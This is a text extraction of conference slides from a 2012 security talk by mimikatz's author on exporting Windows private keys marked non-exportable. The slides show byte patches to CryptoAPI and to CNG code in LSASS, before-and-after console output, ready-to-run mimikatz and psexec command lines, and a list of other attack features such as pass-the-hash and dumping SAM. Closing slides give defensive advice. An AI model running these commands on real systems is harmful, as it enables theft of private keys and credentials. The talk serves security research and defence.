Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

41

Process

CryptoAPI and RSA CSP

Exportable
?

Load

Private

Key

Exported

Key

yes

NTE_BAD_KEY_STATE

no

DPAPI
Decode

PLAYSKOOL

Ask

to export Key

mimikatz ::
crypto ::
patchcapi

because I own my process

When we want to export a certificate with its private key (or only the key), it goes in
rsaenh!CPExportKey

This function do all the work to prepare the export, and check if the key is exportable

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

42

mimikatz # crypto::
exportCertificates

Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
\
My


-

Benjamin Delpy


Container
Clé

: {470ADFBA
-
8718
-
4014
-
B05E
-
B30776B75A03}


Provider : Microsoft Enhanced Cryptographic Provider v1.0


Type : AT_KEYEXCHANGE


Exportabilité

:
NON


Taille

clé

: 2048


Export
privé

dans

'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin
Delpy.pfx
' :
KO


(0x8009000b)
Clé

non
valide

pour
l'utilisation

dans

l'état

spécifié
.


Export public
dans

'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin
Delpy.der
' : OK

================
Certificat

0 ================

Numéro

de
série

: 112169417a1c3ef46a301f99385f50680fa0

Émetteur
: CN=
GlobalSign

CodeSigning

CA
-

G2, O=
GlobalSign

nv
-
sa
, C=BE

Objet: CN=Benjamin Delpy, C=FR

Il ne
s'agit

pas d'un
certificat

racine

Hach
. cert. (sha1):
ab

9e 92 b9 43
ed

47 d9 15
bc

26 93 9e 24 a5 83 03 ac
aa

7e


Conteneur

de
clé

= {470ADFBA
-
8718
-
4014
-
B05E
-
B30776B75A03}


Fournisseur

= Microsoft Enhanced Cryptographic Provider v1.0

La
clé

privée

NE PEUT PAS
être

exportée

Succès

du test de
cryptage

CertUtil

:
-
exportPFX

ÉCHEC

de la
commande

:
0x8009000b

(
-
2146893813)

CertUtil
:
Clé

non
valide

pour
l'utilisation

dans

l'état

spécifié
.

Exportable
?

mimikatz ::
crypto ::
patchcapi

because I own my process

So what ? A module in my own process return that I can’t do something ?

CryptoAPI
is in my memory space, let’s
patch it !














I wrote “
4
” bytes in my memory space


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

43

.text:0AC0B7CB
0F 85
33 C7 FF
FF

jnz

continue_key_export_or_archive

.text:0AC0B7CB
90

nop

.
text:0AC0B7CC
E9

33 C7 FF
FF

jmp

continue_key_export_or_archive

.text:0AC1F749
0F 85

B6 3B FF
FF

jnz

continue_key_export_or_archive_prepare

.text:0AC1F749
90

nop

.text:0AC1F74A
E9

B6 3B FF
FF

jmp

continue_key_export_or_archive_prepare

mimikatz :: crypto ::
patchcapi

demo time !










Import, export, import as not exportable…. export

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

44

mimikatz ::
crypto ::
patchcapi

limitations

Because :


I’m lazy


I’ve seen in majority of case RSA keys for real life use


Elliptic Curve a little…


mimikatz
crypto::
patchcapi

only

deal with :


Microsoft Base Cryptographic Provider
v1.0


Microsoft Enhanced Cryptographic Provider
v1.0


Microsoft Enhanced RSA and AES Cryptographic
Provider


Microsoft RSA SChannel Cryptographic
Provider


Microsoft Strong Cryptographic
Provider


…all based
on
rsaenh.dll

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

45

mimikatz ::
crypto ::
cng

how it works

“Cryptography
API: Next Generation (CNG) is the long
-
term replacement for the
CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in
behavior
.”


http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

“To
comply with common criteria (CC) requirements,
the long
-
lived keys must be isolated
so that they are never present in the application process
. CNG currently supports the
storage of asymmetric private keys by using the Microsoft software KSP that is included
with Windows Server

2008 and Windows

Vista and installed by default.


This time, keys operations are not made in the “user” process context



Process use
RPC

to call “Key isolation service” (
keyiso
) functions


It seems more secure than CryptoAPI…


It is, but it’s not perfect…

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

46

mimikatz ::
crypto ::
cng

how it’s exported ( level
)


KeyIso

Service (LSASS
Process
)

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

47

Process

CNG

Exportable
?

Load

Private

Key

Exported

Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI
Decode

PLAYSKOOL

Ask

to export Key

NT6 System
protected

process

ML_SYSTEM

SYSTEM_MANDATORY_LABEL_
NO_WRITE_UP

SYSTEM_MANDATORY_LABEL_NO_READ_UP

no

mimikatz ::
crypto ::
patchcng

because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead
to
lsass
(
keyiso
):
ncrypt!SPCryptExportKey


This function do all the work to prepare the export, and check if the key is exportable

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

48

mimikatz # crypto::
exportKeys

[
user]
Clés

CNG :


-

cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318


Exportabilité

: NON


Taille

clé

: 2048


Export
privé

dans

'cng_user_0_cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318.pvk' :
KO


mod_cryptong
::
getPrivateKey
/
PrivateKeyBlobToPVK

: (0x80090029)
L'opération

demandée

n'est

pas
prise

en charge.

Exportable
?

mimikatz ::
crypto ::
patchcng

because sometimes I own LSASS

This time, checks and keys are in
LSASS

process…

And what ?














I wrote “1” byte in
LSASS

memory space…


07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

49

.text:6C815210
75

1C

jnz

short
continue_key_export

.text:6C815210
EB

1C
jmp

short
continue_key_export

mimikatz :: crypto ::
patchcng

demo time !










Import, export, import as not exportable…. export
again

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

50

mimikatz ::
crypto ::
patchcng

limitations

Patch operation needs some privileges


Admin (debug privilege)


SYSTEM


mimikatz
crypto::
patchcng

only

deal with :


Microsoft Software Key Storage
Provider (maybe others
algs

than RSA)


Not a limitation of
mimikatz
, but MMC
addin

for certificates cannot
export CNG certificates… even those that are exportable (
hu

?)


certutil

can…

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

51

mimikatz ::
crypto ::
patchcng

bonus

After one admin patched LSASS, all users of current system benefit of extra
exports


until reboot /
KeyIso

service restart


Some others programs that doesn’t check the export flag before asking export
can work too


Yeah, like the old good one :
certutil

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

52

C:
\
Users
\
Gentil Kiwi
\
Desktop>
certutil

-
user
-
p
export_waza

-
privatekey

-
exportpfx

cng_user_noexport

test.pfx

MY

================
Certificat

1 ================

[…]

Hach
. cert. (sha1)

:
dc 00 c9 c7 9f 47 96 f2 8a
ff

2d 0e e3 f2 97 e3 6f c2
ce

8b


Conteneur

de
clé

= cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318


Fournisseur

= Microsoft Software Key Storage Provider

La
clé

privée

NE PEUT PAS
être

exportée

Succès

du test de
chiffrement

CertUtil

:
-
exportPFX

ÉCHEC de la
commande

: 0x8009000b (
-
2146893813)

CertUtil
:
Clé

non
valide

pour
l'utilisation

dans

l'état

spécifié
.


C:
\
Users
\
Gentil Kiwi
\
Desktop>
certutil

-
user
-
p
export_waza

-
privatekey

-
exportpfx

cng_user_noexport

test.pfx

MY

================
Certificat

1 ================

[…]

Hach
. cert. (sha1)

:
dc 00 c9 c7 9f 47 96 f2 8a
ff

2d 0e e3 f2 97 e3 6f c2
ce

8b


Conteneur

de
clé

= cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318


Fournisseur

= Microsoft Software Key Storage Provider

Succès

du test de
chiffrement

CertUtil
:
-
exportPFX

La
commande

s'est

terminée

correctement
.

mimikatz ::
crypto

memo

Some commands :


mimikatz

crypto::
patchcapi

crypto::
exportCertificates

exit


psexec

\
\
windows
-
s
-
c c:
\
mimikatz
\
Win32
\
mimikatz.exe

crypto
::
patchcapi

crypto
::
patchcng

"
crypto::
exportCertificates

CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::
exportKeys

computer"
exit


mimikatz #
crypto::
exportCertificates

CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote
Desktop"


mimikatz
privilege::debug crypto::
patchcng

crypto::
patchcapi

crypto
::
exportCertificates

crypto::
exportKeys

exit


Password :


PFX files are protected by this password :
mimikatz


Keys


When you import multiple time a certificate, exportable or not, Windows make duplicate keys


When you delete a certificate,
Windows does not delete its private
key

funny isn’t it
?


So yes, mimikatz can export it

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

53

mimikatz ::
crypto

what
we can do ?

Exactly the same as for
sekurlsa
, it will prevent access to
accounts / computer !


no admin, no admin, no admin…


Basics


Use
smartcards/token

for users certificates


Use Hardware Security Modules (
HSM
), even
SoftHSM


More in depth


See what Microsoft can do with
TPM

from Windows 8


Virtual
SmartCard

seems
promising


Verify vendors implementation (Lenovo
, Dell, …)
of TPM CSP/KSP


Their biometrics stuff was a little buggy ;)

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

54

mimikatz

what else can
it
do ?

Play with minesweeper

Manipulate some handles

Pass the hash

Dump SAM / AD

Stop
event
monitoring

Patch Terminal Server

Basic GPO bypass

Applocker

/ SRP bypass

Driver


Play with tokens & privileges


Display SSDT x86 & x64


List
minifilters

actions


List Notifications (process / thread / image / registry)


List Objects hooks and procedures






07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

55

mimikatz

that’s

all folks !

Thanks’ to /
Merci à :



my girlfriend for her support (her LSASS crashed few times)


Application Security Forum
to
offer me this great
opportunity


Partners and Sponsors for sure !


Microsoft
to
always consider
it as normal/
acceptable




Security friends/community for their ideas &
challenges


nagual
,
newsoft
,
mubix
, …


You, for your attention !


Questions ?


Don’t be shy ;)

especially if you have written the corresponding slide
number

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

56

Blog, Source Code &
Contact

blog


http
://blog.gentilkiwi.com

mimikatz

http://
blog.gentilkiwi.com/mimikatz

source

https://code.google.com/p/mimikatz
/

email

benjamin@gentilkiwi.com

07/11/2012

Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

57